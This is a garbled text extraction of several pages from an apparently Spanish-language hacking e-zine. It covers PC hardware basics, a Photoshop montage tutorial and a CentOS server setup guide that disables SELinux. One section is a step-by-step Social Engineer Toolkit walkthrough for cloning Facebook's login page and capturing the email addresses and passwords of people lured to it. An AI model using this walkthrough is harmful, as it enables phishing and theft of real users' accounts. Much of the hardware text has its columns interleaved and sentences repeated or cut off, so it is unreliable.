de proceso (CPU) según la mayoría de carcasa de la computadora. CPU en
realidad es el microprocesador el cual
tiene como principal objetivo procesar los datos.
Convengamos que un
microprocesador se puede dividir en dos áreas:
Área de trabajo Área de Control
34
SeNeGe
Son la que determinan la velocidad y la
Sempron 55º 80º
ejecución encargada de dar las órdenes a
Athlon x2 55º 85º
eficiencia del procesador. Las áreas de
las diversas partes del microprocesador se clasifican en:
Unidad Aritmética Lógica y Unidad de punto Flotante
Encargada de realizar todas las operaciones matemáticas y lógicas. Maneja operaciones avanzadas de las matemáticas (tales como
funciones trigonométricas y trascendentales) con mayor precisión. Se encarga de verificar que los datos procesados sean correctos.
La velocidad de mide en MHz, esto representa la cantidad de veces por segundos que el
procesador puede realizar cierto cálculo o proceso. A continuación se presenta una
Celeron D 45º 70º Pentium 4 2Ghz 42º 75º
Intel Core 2 Duo 52º 85º
Factor de formas
Las placas madres se pueden diferenciar según sus características, tamaño, etc. Normalmente se clasifican según su factor de forma (XT, AT, ATX, ATX 2).
Veamos en el gráfico la ubicación de cada componente:
pequeña tabla que ayudará con las unidades de
Ej. Motor de Disqueteras, motor de
Discos Rígidos, motor de CDROM.
Ej. Placa lógica de disco duro, placas de expansión, etc.
como un microprocesador Intel Core 2 duo
3,3V o menos se incorporan debido a
(que permite trabajar con 64bits) pero
que las características de diseño de las
nuestro Sistema Operativo (por ejemplo el
nuevas PC, hacen que sus
Windows XP) es de 32Bits nunca
componentes consuman menos tensión
aprovecharemos dicho procesador ya que
que antes, Ej. (Microprocesador,
el mismo trabaría solo a 32bits.
memorias, placas de video, etc.)
Zócalo del microprocesador
Gabinetes y tipos:
El zócalo o socket es donde insertamos el
microprocesador. Está ubicado en la placa
La carcasa o gabinete de un equipo es el
madre (detallaremos placa madre en las
esqueleto metálico (los hay también de
próximas unidades)
alumnio, plástico, acrílico, etc) que
Fuentes de alimentación Basicamente hablamos de la fuente ..
Que cumple funciones básicas como:
_ Rectificar la corriente alterna a corriente continua.
_ Generar los voltajes de corriente continua Voltajes de la fuente de alimentación:
35
alimentar motores dentro de la PC.
circuitos dentro de la PC.
Si compramos procesadores de 2 núcleos
minima y Temperatura máxima
negro) se utilizan para
negro) se utilizan para alimentar
1 Hz 1 Hz 1 Mhz 1000 Hz 1Ghz 1000 Mhz
Las temperaturas del Procesador ideal
12V (cable amarillo y uno de los de color
5V (cable rojo y uno de los de color
medidas:
Temperatura de los procesadores
Las fuentes de alimentación entregan distintos voltajes a los componentes de la PC.
contiene los diferentes componentes internos de la PC.
Mini Tower (son pequeños y utilizados en espacios reducidos).
Médium Tower (es el más utilizado en la actualidad).
Full Tower (es el más grande, usado normalmente para servidores).
Slim Tower (similar al minitower pero más delgado).
Desktop (gabinete dispuesto en forma
horizontal) tiene como particularidad la posibilidad se apoyar encima de éste el monitor reduciendo espacio.
Funcionamiento del disco duro Los cabezales se desplazan
En la siguiente imagen podemos
visualizar el cable de datos (o bus de
datos) y el cable de alimentación que van conectados al disco duro ATA.
sincronizadamente y se introducen como un peine dentro de los espacios vacíos o
libres entre los discos que están girando.
Es importante aclarar que cuando hablamos del disco duro siempre nos imaginamos un solo disco o plato interno girando.
diferencia de los discos ATA (IDE), los
discos SATA no se configuran, ya que el bus de datos de la placa del disco duro
solo permite una sola unidad por conector. Una de las ventajas es la velocidad si la
Ventilación del gabinete
comparamos con los discos ATA (hasta
El gabinete tiene entre sus funciones crear
133Mb/s) en este caso los discos SATA
una corriente de aire interna para refrigerar
tienen una tasa de transferencia de unos
los distintos componentes internos.
300Mb/s.
Puede haber más de un cooler o ventilador
interno. Además suele haber modelos de
gabinetes donde una de sus tapas laterales contiene un cooler.
La distancia entre cabezal y superficie de
A continuación la imagen:
parte del promedio de un cabello humano.
disco es aproximadamente a una centésima
Tipos de discos duros según tecnología IDE (Integrated Drive Electronics) es una denominación comercial, ya que la
denominación técnica para estos discos
duros es ATA (Conexión AT), deriva del diseño original, el cual era conectar una Medidas actuales de diversos dispositivos de Almacenamiento
combinación de unidad y controlador al bus de una computadora AT.
información sin necesidad de pilas o
Disco Duro 160Gb – 250Gb – 320Gb –
baterías.
500Gb – 750GB – 1000Gb
Es importante a la hora de quitar el
Disquete 1,44 Mb DVD 4,7Gb
dispositivo del puerto USB, previamente La ventaja del
Cinta magnética 40Gb – 80Gb
cable de 80 hilos que al tener hilos a masa
– 32Gb
pueden producir los hilos de tensión.
Pendrive 1Gb – 2Gb – 4Gb – 8Gb – 16Gb Memoria SD y micro SD 1Gb – 2Gb – 4Gb – 8Gb
Bluray 25Gb – 50Gb
Es un dispositivo de almacenamiento que
utiliza la memoria flash para almacenar la
Dispositivo Capacidad
CD 700Mb
Pendrive
disminuye las interferencias eléctricas que
desde el Windows realicemos la siguiente tarea:
Nos ubicamos en la barra de tareas
(normalmente está abajo del escritorio de
windows) y desde el ícono que aparece en la esquina inferior derecha de la barra
antes mencionada (al lado de la hora de la PC)
36\
Hacemos doble clic y luego seleccionamos
donde dice Dispositivo de almacenamiento masivo USB y presionamos en el botón llamado Detener.
Periféricos de salida son los que reciben la información de la CPU y la muestran al usuario. Ejemplos: monitor, parlantes, impresoras. Periféricos de entrada/salida son el caso típico de las impresoras multifunción (las mismas tienen la posibilidad de escanear e imprimir) Periféricos de almacenamiento son aquellos encargados de almacenar los datos. Ejemplos: disco duro, cd, dvd, pendrive.
Visualizaremos una ventana en la cuál marcaremos el dispositivo a
desconectar (en este caso un pendrive
marca CORSAIR y luego presionamos en Aceptar.
Una vez respetado estos pasos podemos quitar con seguridad nuestro pendrive.
Tipos de periféricos Periféricos de entrada
_ Periféricos de salida
_ Periféricos de entrada/salida
_ Periféricos de almacenamiento _ Periféricos de comunicació
Periféricos de entrada son los que permiten ingresar datos externos nuestra
computadora. Algunos de estos periféricos son: teclado, micrófono, webcam, escáner, Mouse y otros.
37\
Periféricos de comunicación permiten el vínculo entre computadoras o entre la PC y otros periféricos. Ejemplos: fax/modem, hub, switch, router, placa de red, placa madre.
Monitores
CRT (tubo de rayos catódicos)
Resoluciones aconsejables de los monitore Tamaño de monitor Cantidad de píxeles 14” 640 x 480 15” 800 x 600 17” 1024 x 768 19” 1280 x 1024 20” 1600 x 1280 21”1600x1280
LCD (Display o pantalla de cristal líquido)
Un punto a tener en cuenta a la hora de elegir un monitor es la entrada de datos, hay monitores que traen incorporados el conector VGA y el DVI.Un punto a tener en cuenta a la hora de elegir un monitor es la entrada de datos, hay monitores que traen incorporados el conector VGA y el DVI.Un punto a tener en cuenta a la hora de elegir un monitor es la entrada de datos, hay monitores que traen incorporados el conector VGA y el DV
Obtener contraseña de Iniciamos nuestro backtrack Ahora iniciamos The SocialEngineer Toolkit (SET)…
Luego la opción 3 y enter Luego la opción 2 y enter Despues la opción 2 y enter Nos mandara un pantalla:
Luego la opción 3 y enter Nos dice que la herramienta no se use con fines malintencionados sino de prueba, le damos Y y ENTER
Luego la opción 2 y enter Elegimos la opción 1 y enter
38
arthusu
Ahora se la pasamos a alguien… con un poco de ing. Social Ponemos la url que queremos clonar el sitio en este caso facebook XD! (la url tiene que llevar http :D ) Luego enter y enter y esta escuchando en el puerto 80 los que entren capturando las pass.
El mete su correo y contraseña Por eso hay que fijarse en la url
Ponemos ifconfig para ver nuestra ip ahora cuando
El se logea y nos sale su correo y pass
entremos desde otra pc a esa ip… El se logea y nos sale su correo y pass...
39
LEVANTANDO EL HYPER INTRODUCCION
mencionaron.
# IMPORTANE: en todo momento SI TIENES UNA VERSION
Pero una vez que crece mas tu pagina y pasa de ser a pagina
siempre y cuando en la parte de "REPOS" instales los sitorios
realidad vez la gran necesidad de mejor adquirir un servidor
menor a 6 de CentOS, puedes considerar seguir el manual que vayan para tu version.
En este manual practico aprenderas como instalar un servidor
GNU/Linux basado en la distribucion CentOS, he utilizado la version actual mas nueva (CentOS 6), asumiendo que ya
comun (o blog) a una plataforma de sevicios, es cuando en
debido a las grandes limitaciones de un servico de Hosting.
La alternativa a un Hosting, seria la contratacion de un Servidor Dedicado o Servidor Dedicado Virtual.
tenemos instalado CentOS aprenderas sobre todos los servicios
DEDICADOS
basica de los servicios.
dedicados normales y dedicados virtuales:
que debe contar un servidor, la instalacion y configuracion
Los servidores dedicados se dividen en dos, los servidores
Estas implementaciones son recomendadas 100% para
Un Servidor Dedicado Virtual es basicamente una maquina
que en todo momento pueden servirte tambien para un servidor
fisico real,
servidores dedicados (en la nube), pero debes tomar en cuenta local.
TIPOS DE SERVICIOS
virtual (VirtualBox, VMWare o Xen) que corre en un servidor el unico detalle es que si tu proveedor tiene 10 virtuales corriendo, entonces toda la RAM es compartida entre los 10 virtuales. Y entre otras limitaciones:
HOSTING
No puedes crear mas virtuales dentro de tu virtual.
servidores y pretender levantar un sitio web con contenido
Si la maquina virtual tiene limitaciones, entonces tu sistema
Generalmente cuando tienes un primer acercamiento a
basico y servicios muy comunes (face connect, blog, comments, etc...) lo mas sencillo es contratar un servidior de Hosting en donde el proveedor de Hosting te proporciona una cantidad limitada o especifica de espacio en disco duro para
El ancho de banda es compartido. operativo las hereda.
Si tu proveedor tiene una sola tarjeta de red, entonces todos los virtuales pasan por la misma interface.
almacenamiento de datos, acceso a servicios externos necesarios
En un Servidor Dedicado normal, basicamente se te esta
dominio).
todos los servicios como si tuvieses la maquina puesta en tu
como: MySQL, Postfix (servidor de correo) y DNS (para el
En un Servicio de Hosting existen limitaciones muy marcadas
arrendando un equipo de computo fisico completo, gozando de propia casa o negocio.
como:
Las ventajas son muy amplias:
Tienes un espacio limitado en disco duro para almacenamiento
Puedes instalar cualquier servicio (FTP, Apache, Bind, MySQL,
El servicio de Base de Datos MySQL es limitado a cierto
Tienes acceso a una consola para manejar tu equipo,
de datos.
numero de bases creadas y peso en consumo total.
Asterisk, Icecast, Virtuales, VNC, SSH, etc..).
El servidor Postfix (SMTP) esta limitado a un numero de
Las limitaciones:
El ancho de banda es limitado a cierto consumo.
Tu te encargas de tu seguridad.
dominio.
Tu te encragas de respaldar.
correos de salida diarios.
No tienes acceso a un DNS, solo a establecer tu propio Existe una limitacion en la creacion de subdominios. El servidro FTP te limita a cierto numero de cuentas. No puedes requerir mas servicios, mas los que ya se
40 ANGEL
Tu configuras todo.
Debes tener amplios conocimientos. Es recomendable un servidor dedicado cuando tus exigencias y
necesidades sobre pasan a un servicio de hosting comun :D. INTERFACES
Si tenemos una o varios IPs estaticas pero solo contamos con una sola tarjeta de red, lo mas correcto seria configurar hebras de la
misma configuracion donde solo vamos poniendo las demas IPs asociando estas nuevas IPs con un valor de ethX compartido.
shell# cd /etc/sysconfig/networkscripts/ # ip estatica 1 eth0 shell# cat ifcfgeth0 DEVICE=eth0 BOOTPROTO=none ONBOOT=yes IPADDR=10.10.10.1 NETMASK=255.255.255.0 GATEWAY=10.10.10.254 TYPE=Ethernet HWADDR=aa:bb:cc:dd:ee:ff # ip estatica 2 eth0:0 shell# cat ifcfgeth0:0 DEVICE=eth0:0 BOOTPROTO=none ONBOOT=yes IPADDR=10.10.10.2 NETMASK=255.255.255.0 GATEWAY=10.10.10.254 TYPE=Ethernet HWADDR=aa:bb:cc:dd:ee:ff # ip estatica 3 eth0:1 shell# cat ifcfgeth0:1 DEVICE=eth0:1 BOOTPROTO=none ONBOOT=yes IPADDR=10.10.10.3 NETMASK=255.255.255.0 GATEWAY=10.10.10.254 TYPE=Ethernet HWADDR=aa:bb:cc:dd:ee:ff # reiniciar para cargar cambios shell# /etc/init.d/network restart # ver las interfaces shell# ifconfig a
SELinux: "Disables"
Damos Ok y hay que reiniciar: shell# reUPDATE CENTOS Ya configurado todo, debemos rehacer update: # importamos llaves de servidores default
shell# rpm import /etc/pki/rpmgpg/RPMGPGKEY* shell# yum update y REPOS
Es bueno tener otros Repositorios habilitados ya que comunmente
los repos por default no tienen muchos mas archivos que suelen ser
necesarios a la hora de quere otras aplicaciones o implementaciones de seguridad en nuestro server: # paquete necesario shell# yum install y rpmlibs shell# yum install y yumutils # repos shell# cd /etc/pki/rpmgpg/ shell# wget http://apt.sw.be/RPMGPGKEY.dag.txt shell# rpm import RPMGPGKEY.dag.txt shell# wget http://dl.fedoraproject.org/pub/epel/6/i386/epelrelease 65.noarch.rpm shell# rpm import epelrelease65.noarch.rpm shell# wget http://rpms.famillecollet.com/RPMGPGKEYremi shell# rpm import RPMGPGKEYremi shell# wget http://ATrpms.net/RPMGPGKEY.atrpms shell# rpm import RPMGPGKEY.atrpms # editar EPEL y agregar una linea shell# cd /etc/yum.repos.d/ shell# cat epel.repo [epel] ... priority=10 ... # repo RPMForge para Cento5 shell# wget http://apt.sw.be/redhat/el5/en/i386/rpmforge/RPMS/rpmforge release*rpm shell# rpm Uvh rpmforgerelease*rpm # repo ATRpms shellt# wgethttp://dl.atrpms.net/el5x86_64/atrpms/stable/atrpms repo*rpm shell# rpm Uvh atrpmsrepo*rpm
El SELinux es un firewall integrado en CentOS que mas que ayudar,
# actualizacion shell# yum install y yumpriorities shell# yum update y
montarnos nuestras propias reglas de firewall y no depende de la
PAQUETES BASE
echo de hacerle PING al server, nos bannea el IP y no podemos
se requiere en todoas partes y por cualquier software independiente,
DESHABILITAR SELINUX
siempre ya un monton de problemas, lo mas recomendable es
automatizacion, ya que SELinux es tan delicado, que por el simple conectarnos de ninguna forma. # deshabilitando selinus
shell# systemconfigsecurityleveltui Security Level: ( ) Enables (*) Disables
41
Todo sistema GNU/Linux siempre usa un conjunto de paquetes que te recomiendo instales estos paquetes como base (los primer que instales en tu server):
shell# yum install y fetchmail wget bzip2 unzip zip nmap openssl lynx fileutils gcc gccc++
continuara...
FOTOMONTAJE Hola compañeros les vengo a dejar este gran tutorial de como crear un fotomontaje usando 2 animales distintos y obteniendo un gran resultado espero y aprendan bueno empezamos. Primero que nada abrimos las 2 imágenes como se muestra en la siguiente imagen Yo utilizare Estas 2 imágenes
enter
Para validar la selección nos debe de
quedar algo así..
Ya seleccionada la cabeza
del águila la arrastramos a la siguiente imagen “pescado”
y le damos Ctrl+t
y seleccionamos voltiar horizontalmente
Ya abierta la primera imagen utilizaremos
Ie acomodamos la cabeza del aguila como en la siguiente
la herramienta de lazo magnético Ie seleccionamos toda la cabeza del águila
detalladamente ya teniendo eso listo damos
42
m3x1c0h4ck
imagen.
pasamos encima del águila nos
la herramienta borrador
La primera capa le damos en
Le bajamos la opacidad i con borramos esas partes que
quedaría así,
crear mascara de recorte
sobran para dejarla igual que
presionando ctrl+alt+g
Ahora ocultamos la capa del
i nos quedaría asi.
la cabeza del pez. Algo así águila i hacemos una
I la poner en modo oscurecer
selección con la herramienta
Ahora para finalizar damos ctrl+t i en deformar i la
deformamos i nos quedaría asi lazo magnético.
Luego de eso duplicamos esa capa presionando ctrl+j I la capa duplicada la
43
Este es el resultado final